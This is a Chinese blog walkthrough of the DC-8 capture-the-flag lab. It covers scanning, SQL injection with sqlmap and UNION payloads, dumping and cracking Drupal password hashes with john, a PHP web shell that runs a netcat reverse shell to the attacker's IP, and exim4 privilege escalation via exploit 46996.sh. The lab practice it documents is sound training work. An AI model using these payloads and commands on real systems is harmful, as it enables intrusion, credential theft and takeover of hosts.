DC-8 Drupal7

已于 2024-03-25 21:04:06 修改
阅读量583 收藏 17
点赞数 26
分类专栏: DC靶场 文章标签: 网络安全
于 2024-03-25 21:01:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/137006845
版权

信息收集

sudo arp-scan -l

ip为192.168.146.146

浏览网页 cms是Drupal7

网页显示:

在接下来的几周内,本网站将出现中断,同时我们将解决一些悬而未决的问题。

对于给您带来的不便,我们深表歉意。

端口扫描

nmap -A -sV -p- 192.168.146.146

隐藏目录扫描

获取后台登录页面,dirb http://192.168.146.146 -X.php没发现啥有用的

dirsearch -u http://192.168.146.146 -i 200

-i保留响应状态码(不同状态码用逗号分隔,可指定范围,如-i 200,300-400)
-x排除响应状态码(可指定范围,如-x 400,400-500)

403无法访问,301资源被永久转移无法访问,只有200可用

/user/login/是登录界面

robots.txt文件是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限

发现点击details下面的3个连接,

url中会出现参数,nid=1

在url后面加',出现数据库报错

有sql注入漏洞,用sqlmap

sqlmap -u "http://192.168.146.146/?nid=1" --level=5 --risk=3 --batch --current-db

--batch 操作默认选择为y

查看当前使用的数据库--current-db

检测注入点 sqlmap -u 'http://xx/?id=1'

数据库名d7db

布尔盲注、报错注入、时间盲注、联合注入

查看表名

-D指定数据库、--tables列出表

sqlmap -u "http://192.168.146.146/?nid=1" --level=5 --risk=3  -D 'd7db' --tables

有users表

-T指定数据表、--columns列出所有字段

sqlmap -u "http://192.168.146.146/?nid=1" --level=5 --risk=3  -D 'd7db' -T 'users' -columns(这样运行,没有显示结果)

sqlmap -u "http://192.168.146.146/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns(这样才会有结果)

有name和pass

-C 列名 在-D -T情况下输出某列数据的值、--dump 拉取数据存放到本地,获取值,也就是表中的数据

sqlmap -u "http://192.168.146.146/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C 'name,pass' --dump(这个不行)

sqlmap -u “http://192.168.146.146/?nid=1” -D d7db -T users -C name,pass --dump(这样有结果)

有2个用户admin和join

手工注入暴库方法

参考<渗透练习>DC-8靶机渗透实验_渗透练习dc-8-CSDN博客

数据库名nid=0 union select database()

数据库表nid=0 union select group_concat(table_name) from
information_schema.tables where table_schema=database()

user表字段 nid=0 union select group_concat(column_name) from
information_schema.columns where table_name=’users’ and
table_schema=database()

数据nid=0 union select group_concat(name,pass) from users

john

用户名为john,提示我们用john ,一个基于字典的快速破解密码的工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等

把两个密文写进文件pass.txt

用echo没反应直接用vi

echo "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z" > pass.txt

echo "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" >>pass.txt

暴破密码

john pass.txt

解密出一个口令,turtle ,我猜是john用户的,因为admin不会这么容易拿到

试试远程登录

ssh john@192.168.146.146 没成功

后台登陆

观察在edit 可以上传图片用作用户的虚拟面孔,但是要是上传木马图片,不知道路径在哪

在find content点击contact us edit点击webfrom 再点击from settings可以添加php代码

上面的语句,是我们contact us提交内容出现的

目录http://192.168.146.146/node/3/done?sid=1

在里边输入 让dc8连接我们的kal主机,并创建一个shell

木马<?php system("nc 192.168.146.140 5556 -e /bin/bash"); ?>

是kali的ip

监听5556端口nc -lvp 5556

之前一直没成功,把ip写错了

交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

要提权

试了suid和git不行

查看/etc/passwd有一个用户dc8user

看一下有无系统漏洞

uname -a

hostnamectl

searchsploit

看了别的博文,知道可以利用 

exim4提权

exim4是 邮件传输代理服务器软件

查看版本 exim4 --version

版本为4.89

有一个提权漏洞46996.sh

find / -name linux/local/46996.sh

或者searchsploit -p(显示漏洞利用的完整路径) 46996.sh

查看

复制文件cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh

开启http服务

python -m http.server 8888 

倒数第二个

dc7在/tmp目录wget 192.168.146.140:8888/hack.sh

或者

scp(还不知道咋用的)

scp root@192.168.146.140:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/hack.sh

查看文件权限

赋予可执行权限

chmod 777 hack.sh

运行 拿到root权限 不过并不稳定

一会就退出了

拼手速拿flag

我记得上次运行sh文件 执行了这个操作 这次没用到

得在自己的kali终端操作

vi hack.sh :set ff? --------查询文件格式


:set ff=unix

------- 将文件格式改成Unix格式,告诉 vi 编辑器,使用unix换行符

MOMO8849
关注
  • 26
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DC-8 Drupal7,网络安全面试相关文章及Github学习资料
2401_83947105的博客
04-15 632
nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -C ‘name,pass’ --dump(这个不行)nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -columns(这样才会有结果)nid=1” --level=5 --risk=3 -D ‘d7db’ -T ‘users’ -columns(这样运行,没有显示结果)(img-oTWraAf9-1713125742362)]
DC-8靶场
2301_76690905的博客
12-20 1329
下载后解压会有一个DC-8.ova文件。在网页里到处点击,找到了可以执行php代码的地方,可以执行Php代码的地方在,联系我们-->WEBFROM-->Form settings的地方,选择php code。-p, --path [EDB-ID] 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号。使用“-v”(详细)来尝试更多的组合。
DC-7靶场实战
qq_42754807的博客
03-25 893
DC-7靶场实战
Vulnhub DC-8
Pai_Space
04-05 1006
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
DC-8详细渗透过程
MRS_jianai的博客
12-26 424
DC-8靶机详细渗透过程
DC-8靶机渗透
m0_62008601的博客
06-05 1022
dc-8靶机详细渗透过程
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4869
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
DC-7靶机渗透详细流程
braty_的博客
02-07 1508
DC-7靶机渗透详细流程
DC靶机系列:DC-8
Ays.Ie的博客
02-28 258
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
BBEdit-Clippings-for-Drupal:用于Drupal 7的BBEdit剪辑
05-26
这是Drupal 7的剪裁,包括: 所有挂钩 所有drupal_ *功能 所有devel模块的打印/调试功能 常见功能,例如t,l,url,check_ * 控制结构,例如for,if和switch 氧气和功能片段 一些主题功能可用于快速插入template...
drupal-project:Drupal项目的Composer模板。 通过“ composer create-project drupal-composerdrupal-project”快速安装
02-28
composer create-project drupal-composer/drupal-project:9.x-dev some-dir --no-interaction 使用composer require ...您可以将新的依赖项下载到您的安装中。 cd some-dir composer require drupal/devel ...
fepper-drupalDrupal的Fepper
02-19
用于网站快速原型制作的前端原型工具Fepper的此发行版具有为Drupal 8配置的模板以及为容纳这些模板而构建的。 为了使该项目适应Drupal 7,请遵循。 如果您不需要与Drupal交互,。模板重用对source/03-templates中的...
ansible-deploy-drupal:用于部署Drupal 8站点的Ansible角色
02-05
在给定的标题和描述中提到的 "ansible-deploy-drupal" 是一个专门为部署 Drupal 8 网站设计的 Ansible 角色。这个角色简化了 Drupal 8 系统的安装和配置过程,使开发者可以更高效、一致地部署 Drupal 应用。 首先,...
apigee-api-catalog-drupal:使用Drupal的内容管理方法管理您的API目录
05-22
适用于Drupal的Apigee API目录 将OpenAPI规范作为文档提供给您的API开发人员。 概述 启用此模块后,它将创建一个名为“ API Doc”的新内容类型。 您可以在管理菜单中的内容> API目录下添加新的API文档。 添加后,每...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于微信小程序的高校体育互动平台设计与实现
07-21
在当前移动互联网技术广泛渗透各行业的背景下,高校体育教育面临着新的发展机遇和挑战。本研究以满足学生多样化体育需求、促进高校体育信息化管理为目标,探索了利用微信小程序等现代技术的体育互动平台设计与实施。通过深入文献回顾和定性、定量研究方法,全面了解了高校学生的体育需求及现有技术解决方案。在微信小程序技术支持下,设计了功能全面、用户友好、安全性高的平台,并多次迭代优化。实际应用和评估显示,该平台为学生提供了信息发布、活动报名、成绩查询和互动交流等综合体育活动管理服务。数据分析表明,相较传统管理方式,平台显著提升了学生体育活动参与度,增强了锻炼意识,同时为教育工作者提供了高效便捷的管理工具。基于微信小程序的高校体育互动平台为体育教育带来新的研究方向和实践机遇,不仅满足学生需求,还为教育工作者提供了灵活、有效的管理工具。 建议高校体育部门深入合作,结合国家政策推广完善该平台,提供培训和技术支持,确保其广泛应用和推广。
机器学习Python实战-重庆理工大学编著 教学ppt
最新发布
07-21
机器学习Python实战-重庆理工大学编著 全6章教学ppt(500+页)
软件杯 基于bert4keras与T5进行标题生成模型的训练与微调,对模型进行Quantize,并使用ONNX部署模型.zip
07-21
中国软件杯 全国二等奖基于 bert4keras 与 T5-pegasus 进行标题生成模型的训练与微调,对模型进行 Quantize,并使用 ONNX 部署模型,部署后服务请求时长约 0.6220 秒(Ubuntu 20 & 8 核 CPU) 【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
Drupal7权威指南
8. **API 使用**:Drupal 7 的API,如钩子系统(Hooks)、菜单系统、表单API和事件处理器,开发者可以利用这些API实现复杂的网站功能。 9. **Web服务集成**:Drupal 7 支持RESTful Web服务,可能涉及如何创建和使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值